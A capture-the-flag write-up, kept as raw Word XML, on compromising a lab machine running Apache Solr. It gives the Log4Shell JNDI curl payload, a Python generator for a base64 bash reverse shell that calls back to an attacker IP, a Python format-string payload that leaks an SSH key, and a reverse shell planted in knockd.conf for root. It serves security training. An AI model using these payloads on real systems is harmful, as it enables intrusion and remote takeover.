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SOLR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a4djl1a9lxjf"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6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analyzing the Nmap output, we detected the existence of a web service on port 80, in addition to ports 22 for SSH and 8389 for an unknown service. Initially, we will focus our attention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6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Upon accessing the application on port 80, we obtained interesting information. We observed that the service running on port 8983 is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Solr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, an open-source enterprise search platform written in Java. Notably, we identified a vulnerability related to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4j</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05100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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Akamai Blog | CVE-2021-44228 – Zero-day vulnerability in Apache Log4j that allows RCE (Remote Code Execution)</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critical unauthenticated RCE (Remote Code Execution) vulnerability (CVE-2021-44228) was reported in Log4j, an open-source logging library. In the last 24 hours, Akamai has been working directly with customers to deploy WAF rules and mitigate exposure. Log4j is embedded in many popular frameworks, making the impact widespread. The vulnerability is being actively exploited and, when abused, the threat actor can execute arbitrary code on systems running applications that contain the library.</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https://www.akamai.com/pt/blog/news/CVE-2021-44228-Zero-Day-Vulnerability</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>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begin the exploitation phase. As previously mentioned, to take advantage of this vulnerability, it is necessary to use Java 8. I will choose to create a Docker container with Java 8 installed to ensure that there is no risk of breaking our main system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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docker run -it --rm -v /home/&lt;your-user&gt;/Desktop/Solr:/app --network=host openjdk:8</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adopting this approach, we will be sharing a volume and also our network interface, allowing the VPN to be used inside the Docker environment.</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79"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use the LDAP server located in the Marshalsec repository:</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https://github.com/mbechler/marshalsec</w:t>
        </w:r>
      </w:hyperlink>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cloning the repository inside our Docker environment, we can use the following command to compile it </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mvn clean package -DskipTests.</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41400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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compilation is completed, we can generate our payload that will result in a shell. Aware of Java’s sensitivity to certain special characters, I created a script that facilitates the direct embedding of a reverse shell.</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#!/usr/bin/python3</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#Description: java.lang.Runtime.exec() Payload Workarounds - ReverseShell</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base64</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sys</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generate():</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IpAddress = sys.argv[1]</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Port = sys.argv[2]</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PayloadReverseShell = f"bash -i &gt;&amp; /dev/tcp/{IpAddress}/{Port} 0&gt;&amp;1".encode("utf-8")</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EncodedPayload = base64.b64encode(PayloadReverseShell)</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Base64ReverseShell = EncodedPayload.decode("utf-8")</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print("bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (Base64ReverseShell))</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__name__ == '__main__':</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len(sys.argv) &lt; 3:</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print(f"Usage: {sys.argv[0]} 10.10.10.1 4444")</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sys.exit()</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generate()</w:t>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57"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create the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit.java</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, embedding our reverse shell payload, and then compile it directly inside Docker using Java 8.</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76"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marshalsec utility built, we can start an LDAP reference server to direct connections to our secondary HTTP server (which we will prepare shortly).</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54100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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server to host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Exploit.class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78"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75"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send a request using cURL as follows:</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'http://&lt;machine-ip&gt;:8983/solr/admin/cores?foo=${jndi:ldap://&lt;vpn-ip&gt;:1389/Exploit}'</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685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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x81x127rfky1"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739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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5co1vh5zemtm" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to fully interactive TTY:</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running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 that we have permission to execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/screen -xR tris0n </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with the permissions of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tris0n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, without needing to provide their password.</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7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use the command:</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 tris0n /usr/bin/screen -xR tris0n</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5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access to the shell as user tris0n. While enumerating user tris0n, we see that they have permission to execute the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/format.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the privileges of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ev3rt0n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8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55900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the code and selecting option 2, it returns an error displaying parts of the code. This is beneficial for us, since we do not have read permission on this script.</w:t>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returned code, there appears to be a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">format string vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, we do not control any direct input in the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Examining the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">format.ips.db.json</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6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inserting content into it, we can execute the script again.</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84300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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6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Apparently, it reads the contents of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/format.ips.db.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Therefore, we can trigger a format string using the following payload:</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{"ips":["{ip.list_blocked.__globals__}"]}</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44600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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12446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0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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modify our payload to reference only the variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Ev3rt0n_k3y"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, thus providing clearer output:</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{"ips":["{ip.list_blocked.__globals__[Ev3rt0n_k3y]}"]}</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44600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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05300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> key of user Ev3rt0n, we can use SSH to connect as that user.</w:t>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48"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obtain the first flag located in the home directory of user Ev3rt0n.</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6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While enumerating user Ev3rt0n, we discover that they have permission to execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">etc/init.d/knockd</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as root and have write permission on the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf</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58"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 file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/init.d/knockd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is designed to monitor port sequences on the machine. If the ports are knocked in the correct sequence, the service executes a specific action defined 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/etc/knockd.conf</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6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77"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that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> establishes the sequence </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10007 10006 10005</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to close the SSH connection. When the closing sequence is received, it executes the command defined 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[closeSSH]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 this context, we can insert our payload into that command.</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/dev/tcp/&lt;vpn-ip&gt;/9001 0&gt;&amp;1"</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9"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payload ready, we need to reload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/etc/init.d/knockd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apply the changes to the commands.</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/etc/init.d/knockd reload</w:t>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58900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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5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proceed with the port knocking sequence </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">knock &lt;machine-ip&gt; 10007 10006 10005 -vvv. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this way, it triggers the command defined in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">closeSSH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is our reverse shell payload.</w:t>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71600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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Fonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And with that, we obtain root access and retrieve the final flag.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId41" w:type="default"/>
      <w:headerReference r:id="rId42" w:type="first"/>
      <w:headerReference r:id="rId43" w:type="even"/>
      <w:footerReference r:id="rId44" w:type="default"/>
      <w:footerReference r:id="rId45" w:type="first"/>
      <w:footerReference r:id="rId4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4">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1"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1"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Solr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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.pn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image" Target="media/image24.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.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23.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.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3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.akamai.com/pt/blog/news/CVE-2021-44228-Zero-Day-Vulnerability" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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4.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sGIPIUe9nTEUXR2CV4tDGf6+A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmE0ZGpsMWE5bHhqZjIOaC54ODF4MTI3cmZreTEyDmguNWNvMXZoNXplbXRtMg5oLjE3NWY1Y3M5NHowbzgAciExaEtXOWZ1RGk0SHdjb2V0WTdNcGNzVmxtTUpvQnNrYTY=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